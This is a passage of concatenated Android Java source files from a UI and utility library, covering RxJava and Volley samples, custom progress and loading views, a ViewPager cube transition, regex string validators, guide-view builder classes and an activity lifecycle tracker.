        Subscriber<String> subscriber = new Subscriber<String>() {
            @Override
            public void onStart() {
                super.onStart();
            }
            @Override
            public void onCompleted() {
            }
            @Override
            public void onError(Throwable e) {
            }
            @Override
            public void onNext(String s) {
            }
        };
        subscriber.isUnsubscribed();// whether the subscription is cancelled
        subscriber.unsubscribe();// cancel the subscription
        Observable<String> observable = Observable.create(new Observable.OnSubscribe<String>() {
            @Override
            public void call(Subscriber<? super String> subscriber) {
                subscriber.onStart();
                subscriber.onNext("Hello");
                subscriber.onNext("Hi");
                subscriber.onCompleted();
            }
        });
        observable.subscribe(observer);// subscribe
        observable.subscribe(subscriber);// same as above, similar to registering a click listener
        // Example 1:
        Observable.just(0, 1, 2, 3)
                .subscribeOn(Schedulers.io())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Action1<Integer>() {
                    @Override
                    public void call(Integer integer) {
                        LogUtil.d(String.valueOf(integer));
                    }
                });
        // Example 2:
        Observable.just(0).map(new Func1<Integer, Drawable>() {
            @TargetApi(Build.VERSION_CODES.LOLLIPOP)
            @Override
            public Drawable call(Integer integer) {
                return getTheme().getDrawable(integer);
            }
        }).subscribeOn(Schedulers.io())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Observer<Drawable>() {
                    @Override
                    public void onCompleted() {
                    }
                    @Override
                    public void onError(Throwable e) {
                        ToastManager.show(getBaseContext(), e.getMessage());
                    }
                    @Override
                    public void onNext(Drawable drawable) {
                        // TODO display the content
                    }
                });
        RxView.clickEvents(null).throttleFirst(500, TimeUnit.MILLISECONDS)// debounce: drop clicks within 500 ms
                .subscribe(new Action1<ViewClickEvent>() {
                    @Override
                    public void call(ViewClickEvent viewClickEvent) {
                    }
                });
    }
    // Stub decoder used by the Rx sample above.
    private Bitmap getBitmapFromFile(File file) {
        return null;
    }
    // Volley GET sample.
    private void volleyGet() {
        String url = "www.baidu.com";
        VolleyRequest.reqGet(url, "getTest", new RequestCallback(getBaseContext()) {
            @Override
            public void onSuccess(String result) {
            }
            @Override
            public void onError(VolleyError error) {
            }
        });
    }
    // Volley POST sample.
    private void volleyPost() {
        String url = "www.baidu.com";
        Map<String, String> params = null;
        VolleyRequest.reqPost(url, "postTest", params, new RequestCallback(getBaseContext()) {
            @Override
            public void onSuccess(String result) {
            }
            @Override
            public void onError(VolleyError error) {
            }
        });
    }
    // Custom rotating loading indicator: three arc segments with a small
    // ball at each gap, spun by a repeating linear animation.
    @TargetApi(Build.VERSION_CODES.M)
    private class LoadingView extends View {
        private static final int DEF_DURATION = 1000;
        //paint
        private Paint mCirclePaint;
        private Paint mAccBallPaint;
        private RectF rectF;
        private int mBigCircleColor = getResources().getColor(R.color.color_green_highlight);
        private int mAccBallColor = getResources().getColor(R.color.color_orange_assist);
        private int mBigCircleStroke = ScreenUtil.dp2px(1);
        private int mDuration = DEF_DURATION;
        private float mBitRadius = ScreenUtil.dp2px(50);
        private float mSmallRadius = ScreenUtil.dp2px(10);
        // Current rotation angle in degrees, driven by the animation.
        private float startAngle = 0.0f;
        public LoadingView(Context context) {
            this(context, null);
        }
        public LoadingView(Context context, AttributeSet attrs) {
            this(context, attrs, 0);
        }
        public LoadingView(Context context, AttributeSet attrs, int defStyleAttr) {
            super(context, attrs, defStyleAttr);
            initView();
        }
        private void initView() {
            // ring paint
            mCirclePaint = new Paint();
            mCirclePaint.setAntiAlias(true);
            mCirclePaint.setColor(mBigCircleColor);
            mCirclePaint.setStrokeWidth(mBigCircleStroke);
            mCirclePaint.setStyle(Paint.Style.STROKE);
            // ball paint
            mAccBallPaint = new Paint();
            mAccBallPaint.setAntiAlias(true);
            mAccBallPaint.setColor(mAccBallColor);
            mAccBallPaint.setStyle(Paint.Style.FILL);
            rectF = new RectF(0, 0, ScreenUtil.getDisplayWidth() >> 1, ScreenUtil.getDisplayWidth() >> 1);
            startRotate(2000);
        }
        // Starts an endless linear rotation that maps animation progress to
        // a 0..360 degree angle and invalidates on every frame.
        private void startRotate(long duration){
            LinearAnimation animation = new LinearAnimation();
            animation.setDuration(duration);
            animation.setRepeatCount(Animation.INFINITE);
            animation.setInterpolator(new LinearInterpolator());
            animation.setLinearAnimationListener(new LinearAnimation.LinearAnimationListener() {
                @Override
                public void applyTans(float interpolatedTime) {
                    startAngle = 360 * interpolatedTime;
                    invalidate();
                }
            });
            startAnimation(animation);
        }
        @Override
        protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
            super.onMeasure(widthMeasureSpec, heightMeasureSpec);
        }
        @Override
        protected void onDraw(Canvas canvas) {
            // drawSeekbar(canvas, 100);
            drawSlowIndicator(startAngle, canvas);
        }
        // Draws three 90-degree arcs plus one ball at each 30-degree gap,
        // all rotated by startAngle.
        private void drawSlowIndicator(float startAngle, Canvas canvas){
            Paint circlePaint = new Paint();
            circlePaint.setAntiAlias(true);
            circlePaint.setColor(Color.parseColor("#A8D7A7"));
            circlePaint.setStrokeWidth(7);
            circlePaint.setStyle(Paint.Style.STROKE);
            canvas.drawPath(getArcPath(), circlePaint);
            int restoreCount = canvas.save();
            canvas.translate(rectF.centerX(), rectF.centerY());
            circlePaint.setStyle(Paint.Style.FILL);
            canvas.drawPath(getBallPath(startAngle + 90), circlePaint);
            canvas.drawPath(getBallPath(startAngle + 90 + 30 + 90), circlePaint);
            canvas.drawPath(getBallPath(startAngle + 90 + 30 + 90 + 30 + 90), circlePaint);
            canvas.restoreToCount(restoreCount);
        }
        // Path of three 90-degree arcs separated by 30-degree gaps.
        private Path getArcPath() {
            Path path = new Path();
            path.addArc(rectF, startAngle, 90);
            path.addArc(rectF, startAngle + 90 + 30, 90);
            path.addArc(rectF, startAngle + 90 + 90 + 30 + 30, 90);
            return path;
        }
        // Alternative rendering: a single sweeping arc with a ball at its tip.
        private void drawSeekbar(Canvas canvas, float startAngle) {
            Paint circlePaint = new Paint();
            circlePaint.setAntiAlias(true);
            circlePaint.setColor(Color.parseColor("#FF4444"));
            circlePaint.setStrokeWidth(7);
            circlePaint.setStyle(Paint.Style.STROKE);
            Path path = new Path();
            path.addArc(rectF, 0, startAngle);
            canvas.drawPath(path, circlePaint);
            int restoreCount = canvas.save();
            canvas.translate(rectF.centerX(), rectF.centerY());
            circlePaint.setStyle(Paint.Style.FILL);
            canvas.drawPath(getBallPath(startAngle), circlePaint);
            canvas.restoreToCount(restoreCount);
        }
        // Small circle positioned on the ring at the given angle (degrees),
        // relative to a canvas already translated to the ring center.
        private Path getBallPath(float startAngle) {
            double sweepAngle = Math.PI / 180 * startAngle;
            Path path = new Path();
            float x = (float) Math.cos(sweepAngle) * (rectF.width() / 2);
            float y = (float) Math.sin(sweepAngle) * (rectF.width() / 2);
            path.moveTo(x, y);
            path.addCircle(x, y, 10, Path.Direction.CCW);
            return path;
        }
    }
    // Animation that simply exposes the interpolated time to a listener.
    private static class LinearAnimation extends Animation {
        private LinearAnimationListener mListener = null;
        interface LinearAnimationListener {
            void applyTans(float interpolatedTime);
        }
        @Override
        protected void applyTransformation(float interpolatedTime, Transformation t) {
            super.applyTransformation(interpolatedTime, t);
            if (mListener != null) {
                mListener.applyTans(interpolatedTime);
            }
        }
        public void setLinearAnimationListener(LinearAnimationListener listener){
            mListener = listener;
        }
    }
}
/**
* >>> Shader 之图形渲染
* - BitmapShader: 图像渲染
* - LinearGradient: 线性渐变
* - RadialGradient: 环形渐变
* - SweepGradient: 扇形渐变
* - ComposeShader: 混合渲染,适用于组合操作
* 使用: mPaint.setShader(XXXShader)
*
* Example:配合 Matrix 实现扇形动态渐变
*
Paint paint = new Paint();
paint.setAntiAlias(true);
paint.setStrokeWidth(8);
paint.setStyle(Paint.Style.STROKE);
int[] f = {Color.parseColor("#00A8D7A7"), Color.parseColor("#ffA8D7A7")};
float[] p = {.0f, 1.0f};
SweepGradient sweepGradient = new SweepGradient(rectF.centerX(), rectF.centerX(), f, p);
Matrix matrix = new Matrix();
sweepGradient.getLocalMatrix(matrix);
matrix.postRotate(startAngle, rectF.centerX(), rectF.centerY());
sweepGradient.setLocalMatrix(matrix);
paint.setShader(sweepGradient);
canvas.drawArc(rectF,0, 360, true, paint);
* */
<file_sep>include ':app', ':androidmultichannelbuildtool-java-master'
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.RectF;
import android.util.AttributeSet;
import android.widget.ProgressBar;
import com.icenler.lib.R;
/**
* 自定义环形百分比进度条:基于ProgressBar
* 1、 属性详情参考:res/values/attr_progress_bar.xml - RoundProgressBarWidthNumber
* Created by Cenler on 2015/2/9.
*/
public class RoundProgressBarWidthNumber extends ProgressBar {
private static final int DEFAULT_TEXT_SIZE = 32;
private static final int DEFAULT_TEXT_COLOR = 0xFFFC00D1;
private static final int DEFAULT_REACHED_COLOR = 0xFFFC00D1;
private static final int DEFAULT_UNREACHED_COLOR = 0xFFD3D6DA;
private static final int DEFAULT_REACHED_PROGRESS_BAR_HEIGHT = 5;
private static final int DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT = 2;
private static final int DEFAULT_RADIUS = 50;
/**
* 全局绘图画笔
*/
protected Paint mPaint = new Paint();
/**
* 百分比进度颜色
*/
protected int mTextColor = DEFAULT_TEXT_COLOR;
/**
* 百分比进度字体大小:单位(sp)
*/
protected int mTextSize = sp2px(getContext(), DEFAULT_TEXT_SIZE);
/**
* 已完成进度条颜色
*/
protected int mReachedBarColor = DEFAULT_REACHED_COLOR;
/**
* 未完成进度条颜色
*/
protected int mUnReachedBarColor = DEFAULT_UNREACHED_COLOR;
/**
* 已完成进度条高度:单位(dp)
*/
protected int mReachedProgressBarHeight = dip2px(getContext(), DEFAULT_REACHED_PROGRESS_BAR_HEIGHT);
/**
* 未完成进度条高度:单位(dp)
*/
protected int mUnReachedProgressBarHeight = dip2px(getContext(), DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT);
/**
* 默认环形半径
*/
protected int mRadius = dip2px(getContext(), DEFAULT_RADIUS);
/**
* 进度比控制显示标志
*/
protected boolean mIfDrawText = true;
protected static final int VISIBLE = 0;
private int paintWidth;// 画笔粗细
/** Convenience constructor for code-created instances. */
public RoundProgressBarWidthNumber(Context context) { this(context, null); }
public RoundProgressBarWidthNumber(Context context, AttributeSet attrs) {
    this(context, attrs, 0);
}
/**
 * Main constructor: reads custom XML attributes and configures the shared
 * paint (text size, round stroke caps, anti-aliasing, dithering).
 */
public RoundProgressBarWidthNumber(Context context, AttributeSet attrs, int defStyle) {
    super(context, attrs, defStyle);
    this.setHorizontalScrollBarEnabled(true);
    getObtainStyleAttributes(attrs);
    mPaint.setTextSize(mTextSize);
    mPaint.setStrokeCap(Paint.Cap.ROUND);
    mPaint.setAntiAlias(true);
    mPaint.setDither(true);
    /*
    setAntiAlias: enable anti-aliasing on the paint
    setDither: enable dithering; drawn colors become smoother and fuller, images clearer
    setStrokeCap: cap style for STROKE or FILL_OR_STROKE paints, e.g. round (Cap.ROUND) or square (Cap.SQUARE)
    setColor: set the paint color
    setARGB: set the paint's a, r, g, b components
    setAlpha: set the alpha value
    setTextSize: set the text size
    setStyle: set the paint style, stroke (hollow) or fill (solid)
    setStrokeWidth: set the stroke width
    getColor: get the paint color
    getAlpha: get the paint's alpha value
    */
}
/**
 * Reads the custom XML attributes (radius, text color/size, bar colors and
 * heights, text visibility) into fields, keeping the defaults for any
 * attribute that was not set.
 *
 * @param attrs
 */
private void getObtainStyleAttributes(AttributeSet attrs) {
    TypedArray attributes = getContext().obtainStyledAttributes(attrs, R.styleable.RoundProgressBarWidthNumber);
    mRadius = (int) attributes.getDimension(R.styleable.RoundProgressBarWidthNumber_progress_radius, mRadius);
    mTextColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_text_color, mTextColor);
    mTextSize = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_size, mTextSize);
    mReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_reached_color, mReachedBarColor);
    mUnReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_color, mUnReachedBarColor);
    mReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_reached_bar_height, mReachedProgressBarHeight);
    mUnReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_bar_height, mUnReachedProgressBarHeight);
    int textVisible = attributes.getInt(R.styleable.HorizontalProgressBarWithNumber_progress_text_visibility, VISIBLE);
    if (textVisible != VISIBLE) {
        mIfDrawText = false;
    }
    /* Give back a previously retrieved StyledAttributes, for later re-use. */
    attributes.recycle();
}
/**
 * Measures the view; when a dimension is not EXACTLY specified, forces it to
 * the ring's outer diameter (radius + stroke, doubled) plus padding.
 */
@Override
protected synchronized void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
    int widthMode = MeasureSpec.getMode(widthMeasureSpec);
    int heightMode = MeasureSpec.getMode(heightMeasureSpec);
    // Effective stroke width: the thicker of the reached/unreached bars.
    paintWidth = Math.max(mReachedProgressBarHeight, mUnReachedProgressBarHeight);
    int diameter = (mRadius + paintWidth) * 2; // outer diameter including the stroke
    if (widthMode != MeasureSpec.EXACTLY) {
        int exceptWidth = this.getPaddingLeft() + this.getPaddingRight() + diameter;
        widthMeasureSpec = MeasureSpec.makeMeasureSpec(exceptWidth, MeasureSpec.EXACTLY);
    }
    if (heightMode != MeasureSpec.EXACTLY) {
        int exceptHeight = this.getPaddingTop() + this.getPaddingBottom() + diameter;
        heightMeasureSpec = MeasureSpec.makeMeasureSpec(exceptHeight, MeasureSpec.EXACTLY);
    }
    super.onMeasure(widthMeasureSpec, heightMeasureSpec);
}
/**
 * Draws the ring in three passes: the full background circle (unreached),
 * the progress arc (reached), and optionally the centered percentage text.
 */
@Override
protected synchronized void onDraw(Canvas canvas) {
    canvas.save();
    canvas.translate(getPaddingLeft(), getPaddingTop());
    String text = getProgress() + "%";
    float textWidth = mPaint.measureText(text);
    float textHeight = mPaint.getFontMetrics().descent + mPaint.getFontMetrics().ascent;
    // Unreached portion: the full background circle.
    mPaint.setStyle(Paint.Style.STROKE);
    mPaint.setColor(mUnReachedBarColor);
    mPaint.setStrokeWidth(mUnReachedProgressBarHeight);
    canvas.drawCircle(mRadius + paintWidth, mRadius + paintWidth, mRadius, mPaint);
    // Reached portion: arc proportional to progress/max.
    mPaint.setColor(mReachedBarColor);
    mPaint.setStrokeWidth(mReachedProgressBarHeight);
    float sweepAngle = this.getProgress() * 1.0f / this.getMax() * 360;
    canvas.drawArc(new RectF(paintWidth, paintWidth, mRadius * 2 + paintWidth, mRadius * 2 + paintWidth), 0, sweepAngle, false, mPaint);
    // Percentage text, centered within the ring.
    if (mIfDrawText) {
        int textX = (int) (mRadius + paintWidth - textWidth / 2);
        int textY = (int) (mRadius + paintWidth + Math.abs(textHeight / 2));
        mPaint.setColor(mTextColor);
        mPaint.setStyle(Paint.Style.FILL);
        canvas.drawText(text, textX, textY, mPaint);
    }
    canvas.restore();
    /* drawArc API reference:
       public void drawArc(RectF oval, float startAngle, float sweepAngle, boolean useCenter, Paint paint)
       oval:       bounding rectangle of the arc's oval
       startAngle: starting angle, in degrees
       sweepAngle: angle swept clockwise, in degrees
       useCenter:  when true the center point is included (draws a pie wedge)
       paint:      paint carrying color, fill style, etc.
    */
}
/**
 * Converts a dp (density-independent pixel) value into raw pixels for the
 * current device density, rounding half-up (same as (int)(v * d + 0.5f)).
 */
public int dip2px(Context context, float dpValue) {
    final float density = context.getResources().getDisplayMetrics().density;
    return (int) (density * dpValue + 0.5f);
}
/**
 * Converts an sp (scaled pixel) value into raw pixels using the device's
 * scaled font density, rounding half-up.
 */
public int sp2px(Context context, float spValue) {
    final float scaledDensity = context.getResources().getDisplayMetrics().scaledDensity;
    return (int) (scaledDensity * spValue + 0.5f);
}
}<file_sep>package com.icenler.lib.view.anima;
import android.support.v4.view.ViewPager;
import android.view.View;
import com.nineoldandroids.view.ViewHelper;
/**
 * Created by iCenler - 2015/5/4:
 * Description: cube-rotation page transition for a ViewPager.
 */
public class CubePageTransformer implements ViewPager.PageTransformer {
    // Note: the unused MIN_SCALE field and the unused local pageWidth from the
    // original implementation have been removed; behavior is unchanged.

    /**
     * Rotates each page around a vertical pivot so adjacent pages meet at the
     * shared edge like two faces of a cube; pages outside [-1, 1] are hidden.
     *
     * @param view     the page being transformed
     * @param position page offset relative to the viewport center
     */
    public void transformPage(View view, float position) {
        if (position < -1) { // [-Infinity,-1): fully off-screen to the left, hide it
            ViewHelper.setAlpha(view, 0);
        } else if (position <= 0) { // [-1,0]: pivot on the right edge
            ViewHelper.setPivotX(view, view.getMeasuredWidth());
            ViewHelper.setPivotY(view, view.getMeasuredHeight() * 0.5f);
            ViewHelper.setRotationY(view, 90f * position);
        } else if (position <= 1) { // (0,1]: pivot on the left edge
            ViewHelper.setPivotX(view, 0);
            ViewHelper.setPivotY(view, view.getMeasuredHeight() * 0.5f);
            ViewHelper.setRotationY(view, 90f * position);
        } else { // (1,+Infinity]: fully off-screen to the right, hide it
            ViewHelper.setAlpha(view, 0);
        }
    }
}
<file_sep>package com.icenler.lib.utils.helper;
import android.util.Patterns;
import com.icenler.lib.receiver.network.NetworkHelper;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
 * Created by iCenler - 2015/7/17.
 * Description: common string utilities.
 * 1. frequently used regex validators
 * 2. hex encoding helper
 */
public class StringHelper {
    private StringHelper() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }
    /**
     * @return true if the whole string consists of full-width / Chinese characters
     */
    public static boolean isChinese(String str) {
        Pattern pattern = Pattern.compile("^[\\u0391-\\uffe5]*$");
        Matcher matcher = pattern.matcher(str);
        return matcher.matches();
    }
    /**
     * E-mail address validation.
     */
    public static boolean checkEmail(String str) {
        Pattern pattern = Pattern.compile("^(\\w)+(\\.\\w+)*@(\\w)+((\\.\\w+)+)$");
        Matcher matcher = pattern.matcher(str);
        return matcher.matches();
    }
    /**
     * Account validation: 6-20 letters or digits.
     */
    public static boolean checkAccount(String str) {
        Pattern pattern = Pattern.compile("^[a-zA-Z0-9]{6,20}$");
        Matcher matcher = pattern.matcher(str);
        return matcher.matches();
    }
    /**
     * Chinese ID-card number validation (15 or 18 characters, last character
     * may be the check digit 'X').
     * FIX: the original pattern only accepted a lower-case 'x', rejecting the
     * canonical upper-case 'X' check digit printed on real ID cards.
     */
    public static boolean checkIDCard(String idCard) {
        Pattern pattern = Pattern.compile("^(([0-9]{14}[xX0-9]{1})|([0-9]{17}[xX0-9]{1}))$");
        Matcher matcher = pattern.matcher(idCard);
        return matcher.matches();
    }
    /**
     * Mobile number validation; on success also records the carrier into
     * NetworkHelper.MOBILES_TYPE.
     * CMCC: 134-139, 150, 151, 157 (TD), 158, 159, 187, 188
     * CUCC: 130-132, 152, 155, 156, 185, 186
     * CTCC: 133, 153, 180, 189 (1349 is satellite)
     */
    public static boolean isMobile(String mobiles) {
        // ^((13[0-9])|(15[^4,\\D])|(18[0,5-9]))\\d{8}$" or
        // ^[1]([3][0-9]{1}|58|59|88|89)[0-9]{8}$"
        Pattern CMCC_REG_EX = Pattern.compile("^1(3[4-9]|5[01789]|8[78])[0-9]{8}$"); // China Mobile
        Pattern CUCC_REG_EX = Pattern.compile("^1(3[0-2]|5[256]|8[56])[0-9]{8}$"); // China Unicom
        Pattern CTCC_REG_EX = Pattern.compile("^1(33|53|8[09])[0-9]{8}$"); // China Telecom
        Pattern pattern = Pattern.compile("^[1]([3][0-9]{1}|58|59|88|89)[0-9]{8}$");
        Matcher matcher = pattern.matcher(mobiles);
        if (matcher.matches()) {
            if (CMCC_REG_EX.matcher(mobiles).matches())
                NetworkHelper.MOBILES_TYPE = NetworkHelper.CMCC;
            else if (CUCC_REG_EX.matcher(mobiles).matches())
                NetworkHelper.MOBILES_TYPE = NetworkHelper.CUCC;
            else if (CTCC_REG_EX.matcher(mobiles).matches())
                NetworkHelper.MOBILES_TYPE = NetworkHelper.CTCC;
            return true;
        } else {
            return false;
        }
    }
    /**
     * Pure integer check (no decimal point allowed).
     * NOTE(review): like the original, this also matches the empty string
     * because of the '*' quantifier — confirm whether that is intended.
     */
    public static boolean isPureNumber(String str) {
        Pattern p = Pattern.compile("^[0-9]*$");
        Matcher m = p.matcher(str);
        return m.matches();
    }
    /**
     * Number check, allowing an optional decimal point.
     */
    public static boolean isValidNumber(String str) {
        Pattern p = Pattern.compile("^\\d+\\.{0,1}\\d*$");
        Matcher m = p.matcher(str);
        return m.matches();
    }
    /**
     * 6-20 character mix of digits and letters (both kinds must appear).
     */
    public static boolean isNumAndLetter(String str) {
        Pattern p = Pattern.compile("(?!^[0-9]+$)(?!^[a-zA-Z]+$)[0-9a-zA-Z]{6,20}");
        Matcher m = p.matcher(str);
        return m.matches();
    }
    /**
     * Web URL validation via android.util.Patterns (see Patterns docs).
     */
    public static boolean isWebUrl(String url) {
        return Patterns.WEB_URL.matcher(url).matches();
    }
    /**
     * @param bytes input bytes
     * @return upper-case hexadecimal representation of the bytes
     */
    public static String byte2Hex(byte[] bytes) {
        final String HEX = "0123456789ABCDEF";
        // StringBuilder instead of StringBuffer: no synchronization needed here.
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            sb.append(HEX.charAt((b >> 4) & 0x0F));
            sb.append(HEX.charAt(b & 0x0F));
        }
        return sb.toString();
    }
}
<file_sep>package com.icenler.lib.view.guideview;
import android.graphics.Rect;
import android.support.annotation.ColorInt;
import android.view.View;
public class Mask {

    /** Shape of the highlighted cut-out. */
    public enum Shape {
        CIRCLE, RECTANGLE
    }

    Rect targetRect;
    Shape shapeStyle;
    int radiusSize;
    int cornerSize;
    int borderSize;
    int borderColor;
    int paddingLeft;
    int paddingRight;
    int paddingTop;
    int paddingBottom;
    int maskId;
    int offsetX;
    int offsetY;

    /** @return a fresh builder for assembling a {@link Mask}. */
    public static Builder builder() {
        return new Builder();
    }

    private Mask(Builder b) {
        targetRect = b.rect;
        shapeStyle = b.shape;
        radiusSize = b.radius;
        cornerSize = b.corner;
        borderSize = b.border;
        borderColor = b.borderColor;
        paddingLeft = b.left;
        paddingRight = b.right;
        paddingTop = b.top;
        paddingBottom = b.bottom;
        maskId = b.maskId;
        offsetX = b.offsetX;
        offsetY = b.offsetY;
    }

    /** Fluent builder for {@link Mask}; unset values keep their defaults. */
    public static final class Builder {
        private Rect rect;
        private Shape shape;
        private int radius;
        private int corner;
        private int border;
        private int borderColor;
        private int left;
        private int right;
        private int top;
        private int bottom;
        private int maskId = View.NO_ID;
        private int offsetX;
        private int offsetY;

        private Builder() {
        }

        public Builder setMaskRect(Rect targetRect) {
            rect = targetRect;
            return this;
        }

        public Builder setShapeStyle(Shape shapeStyle) {
            shape = shapeStyle;
            return this;
        }

        public Builder setRadius(int radius) {
            this.radius = radius;
            return this;
        }

        public Builder setCorner(int corner) {
            this.corner = corner;
            return this;
        }

        public Builder setBorder(int border) {
            this.border = border;
            return this;
        }

        public Builder setBorder(int border, @ColorInt int color) {
            this.border = border;
            borderColor = color;
            return this;
        }

        public Builder setBorderColor(@ColorInt int color) {
            borderColor = color;
            return this;
        }

        public Builder setPaddingLeft(int left) {
            this.left = left;
            return this;
        }

        public Builder setPaddingTop(int top) {
            this.top = top;
            return this;
        }

        public Builder setPaddingRight(int right) {
            this.right = right;
            return this;
        }

        public Builder setPaddingBottom(int bottom) {
            this.bottom = bottom;
            return this;
        }

        public Builder setPadding(int left, int top, int right, int bottom) {
            this.left = left;
            this.top = top;
            this.right = right;
            this.bottom = bottom;
            return this;
        }

        public Builder setMaskId(int maskId) {
            this.maskId = maskId;
            return this;
        }

        public Builder setOffsetX(int offsetX) {
            this.offsetX = offsetX;
            return this;
        }

        public Builder setOffsetY(int offsetY) {
            this.offsetY = offsetY;
            return this;
        }

        public Mask build() {
            return new Mask(this);
        }
    }
}<file_sep>package com.icenler.lib.receiver.lifecycle;
import android.app.Activity;
import android.app.Application;
import android.content.Intent;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.content.LocalBroadcastManager;
import com.icenler.lib.utils.LogUtil;
import java.util.LinkedList;
/**
 * Created by iCenler on 2016/1/28.
 * Description: application-wide Activity lifecycle tracking; maintains a task
 * stack and detects foreground/background transitions.
 */
public class ApplicationLifecycleListener implements Application.ActivityLifecycleCallbacks {
    /**
     * Local broadcast action sent when the app moves to the background.
     */
    public static final String ACTION_BACKGROUND_CHANGED = "app.intent.action.BACKGROUND_CHANGED";
    /**
     * Local broadcast action sent when the app returns to the foreground.
     */
    public static final String ACTION_FOREGROUND_CHANGED = "app.intent.action.FOREGROUND_CHANGED";
    /**
     * Number of started (visible) activities; used to detect fore/background switches.
     */
    private int activeCount = 0;
    /**
     * Whether the app is currently in the background.
     */
    private boolean isBackground = true;
    private Activity preActivity;
    private Activity currActivity;
    private LinkedList<Activity> activityStack = new LinkedList<>();
    /**
     * @return whether the app is currently in the background
     */
    public boolean isBackground() {
        return isBackground;
    }
    /**
     * @return the Activity just below the top of the task stack (may be null)
     */
    @Nullable
    public Activity getPreActivity() {
        return preActivity;
    }
    /**
     * @return the Activity at the top of the task stack (may be null)
     */
    @Nullable
    public Activity getTopActivity() {
        return currActivity;
    }
    /**
     * @return a defensive copy of the Activity task stack
     */
    public LinkedList<Activity> getActivityStack() {
        return new LinkedList<>(activityStack);
    }
    @Override
    public void onActivityCreated(Activity activity, Bundle savedInstanceState) {
        LogUtil.i(activity.getClass().getSimpleName());
        activityStack.add(activity);
    }
    @Override
    public void onActivityStarted(Activity activity) {
        LogUtil.i(activity.getClass().getSimpleName());
        activeCount++;
    }
    @Override
    public void onActivityResumed(Activity activity) {
        LogUtil.i(activity.getClass().getSimpleName());
        if (isBackground) {
            isBackground = false;
            foreground(activity);
        }
        currActivity = activityStack.peekLast();
        LogUtil.d("PreActivity:" + String.valueOf(preActivity));
        LogUtil.d("CurrActivity:" + String.valueOf(currActivity));
    }
    @Override
    public void onActivityPaused(Activity activity) {
        LogUtil.i(activity.getClass().getSimpleName());
        preActivity = activity;
        if (activity.isFinishing()) {// remove the finishing Activity now to cope with delayed onDestroy
            activityStack.pollLast();
            if (activityStack.size() > 1) {
                preActivity = activityStack.get(activityStack.size() - 2);
            } else {
                preActivity = null;
            }
        }
    }
    @Override
    public void onActivityStopped(Activity activity) {
        LogUtil.i(activity.getClass().getSimpleName());
        activeCount--;
        if (activeCount == 0) {
            isBackground = true;
            background(activity);
            if (activityStack.size() > 1) {// switched to background: re-point the preActivity index
                preActivity = activityStack.get(activityStack.size() - 2);
            } else {
                preActivity = null;
            }
        }
    }
    @Override
    public void onActivitySaveInstanceState(Activity activity, Bundle outState) {
        LogUtil.i(activity.getClass().getSimpleName());
    }
    @Override
    public void onActivityDestroyed(Activity activity) {
        LogUtil.i(activity.getClass().getSimpleName());
        activityStack.remove(activity);
        if (activity == preActivity) preActivity = null;
        if (activity == currActivity) currActivity = null;
        LogUtil.d("PreActivity:" + String.valueOf(preActivity));
        LogUtil.d("CurrActivity:" + String.valueOf(currActivity));
    }
    /**
     * Invoked once per background transition; notifies via local broadcast.
     */
    private void background(Activity activity) {
        LogUtil.i("The background to switch");
        LocalBroadcastManager.getInstance(activity).sendBroadcast(new Intent(ACTION_BACKGROUND_CHANGED));
    }
    /**
     * Invoked once per foreground transition; notifies via local broadcast.
     */
    private void foreground(Activity activity) {
        LogUtil.i("The foreground to switch");
        LocalBroadcastManager.getInstance(activity).sendBroadcast(new Intent(ACTION_FOREGROUND_CHANGED));
    }
}
<file_sep>package com.icenler.lib.view.guideview;
import android.view.View;
import android.view.WindowManager;
public class Hint {

    /** Side of the anchor (mask or absolute point) the hint view is attached to. */
    public enum Anchor {
        ANCHOR_LEFT, ANCHOR_RIGHT,
        ANCHOR_TOP, ANCHOR_BOTTOM, ANCHOR_OVER
    }

    /** Alignment of the hint along the anchored edge. */
    public enum Gravity {
        GRAVITY_START, GRAVITY_END, GRAVITY_CENTER
    }

    View hintView;
    Anchor anchor;
    Gravity gravity;
    int absX;
    int absY;
    int offsetX;
    int offsetY;
    int width;
    int height;
    int maskAnchorId;

    /** @return a fresh builder for assembling a {@link Hint}. */
    public static Builder builder() {
        return new Builder();
    }

    private Hint(Builder b) {
        hintView = b.hintView;
        anchor = b.anchor;
        gravity = b.gravity;
        absX = b.absX;
        absY = b.absY;
        offsetX = b.offsetX;
        offsetY = b.offsetY;
        width = b.width;
        height = b.height;
        maskAnchorId = b.maskAnchorId;
    }

    /** Fluent builder; unset values keep the defaults declared below. */
    public static final class Builder {
        private View hintView;
        private Anchor anchor = Anchor.ANCHOR_OVER;
        private Gravity gravity = Gravity.GRAVITY_START;
        private int absX;
        private int absY;
        private int offsetX;
        private int offsetY;
        private int width = WindowManager.LayoutParams.WRAP_CONTENT;
        private int height = WindowManager.LayoutParams.WRAP_CONTENT;
        private int maskAnchorId = View.NO_ID;

        private Builder() {
        }

        public Builder setHintView(View hintView) {
            this.hintView = hintView;
            return this;
        }

        public Builder setAnchor(Anchor anchor) {
            this.anchor = anchor;
            return this;
        }

        public Builder setGravity(Gravity gravity) {
            this.gravity = gravity;
            return this;
        }

        public Builder setAbsX(int x) {
            absX = x;
            return this;
        }

        public Builder setAbsY(int y) {
            absY = y;
            return this;
        }

        public Builder setOffsetX(int x) {
            offsetX = x;
            return this;
        }

        public Builder setOffsetY(int y) {
            offsetY = y;
            return this;
        }

        public Builder setWidth(int width) {
            this.width = width;
            return this;
        }

        public Builder setHeight(int height) {
            this.height = height;
            return this;
        }

        public Builder setLayoutParams(int width, int height) {
            this.width = width;
            this.height = height;
            return this;
        }

